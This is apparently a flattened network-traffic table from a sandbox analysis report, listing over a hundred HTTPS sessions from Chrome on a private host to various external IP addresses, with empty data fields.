                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1172192.168.2.55096090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1173192.168.2.55096290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1174192.168.2.55096390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1175192.168.2.55096490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1176192.168.2.55096523.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1177192.168.2.55096790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1178192.168.2.55096690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1179192.168.2.55096890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1180192.168.2.55097190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1181192.168.2.55097090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1182192.168.2.55097390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1183192.168.2.55097523.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1184192.168.2.55097623.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1185192.168.2.55097890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1186192.168.2.550977223.121.15.244434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1187192.168.2.55097454.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1188192.168.2.550983163.181.92.2414434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1189192.168.2.550980175.6.254.654434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1190192.168.2.550972103.42.144.604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1191192.168.2.550979175.6.254.654434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1192192.168.2.55098623.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1193192.168.2.550981175.6.254.654434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1194192.168.2.55098823.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1195192.168.2.55098723.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1196192.168.2.55098254.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1197192.168.2.55099190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1198192.168.2.55098454.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1199192.168.2.55099323.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1200192.168.2.55099223.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1201192.168.2.55100290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1202192.168.2.55099590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1203192.168.2.55099690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1204192.168.2.55100490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1205192.168.2.55099823.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1206192.168.2.55098554.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1207192.168.2.55100090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1208192.168.2.55099423.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1209192.168.2.55100190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1210192.168.2.55100390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1211192.168.2.55099990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1212192.168.2.55100690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1213192.168.2.55100590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1214192.168.2.55099054.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1215192.168.2.55094038.174.148.434434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1216192.168.2.55098954.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1217192.168.2.55101223.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1218192.168.2.55101123.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1219192.168.2.55101090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1220192.168.2.55099754.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1221192.168.2.551007183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1222192.168.2.551008183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1223192.168.2.551009183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1224192.168.2.551013163.181.92.2264434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1225192.168.2.55101590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1226192.168.2.55101690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1227192.168.2.551014163.181.92.2264434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1228192.168.2.55101790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1229192.168.2.55102023.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1230192.168.2.55101890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1231192.168.2.55101990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1232192.168.2.55102190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1233192.168.2.55102390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1234192.168.2.55102290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1235192.168.2.55102490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1236192.168.2.55102590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1237192.168.2.55102690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1238192.168.2.55102723.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1239192.168.2.55102823.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1240192.168.2.55102990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1241192.168.2.55103090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1242192.168.2.55103223.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1243192.168.2.55103123.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1244192.168.2.55103423.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1245192.168.2.55103523.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1246192.168.2.55104023.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1247192.168.2.551043163.181.92.2264434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1248192.168.2.551033175.6.254.654434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1249192.168.2.55104823.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1250192.168.2.55105090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1251192.168.2.55104790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1252192.168.2.55105590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1253192.168.2.55104923.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1254192.168.2.55105190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1255192.168.2.55105390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1256192.168.2.55105290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1257192.168.2.55105890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1258192.168.2.55105490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1259192.168.2.55105790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1260192.168.2.55105690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1261192.168.2.55105918.245.199.584434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1262192.168.2.55103654.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1263192.168.2.551038103.24.53.334434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1264192.168.2.55104254.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1265192.168.2.55104154.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1266192.168.2.55106323.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1267192.168.2.55106423.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1268192.168.2.551046175.6.254.654434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1269192.168.2.55104543.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1270192.168.2.55106590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1271192.168.2.55103743.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1272192.168.2.55104454.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1273192.168.2.551060175.6.254.654434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1274192.168.2.55106154.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1275192.168.2.55106690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1276192.168.2.55106790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1277192.168.2.55107090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1278192.168.2.55106243.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1279192.168.2.55107623.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1280192.168.2.55107890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1281192.168.2.55106854.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1282192.168.2.55107790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1283192.168.2.55107990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1284192.168.2.55107243.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1285192.168.2.55106943.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1286192.168.2.55108090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1287192.168.2.55107354.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1288192.168.2.55108190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1289192.168.2.55107154.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1290192.168.2.55107454.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1291192.168.2.55108290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1292192.168.2.55107543.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1293192.168.2.55108390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1294192.168.2.55108723.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1295192.168.2.55108623.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
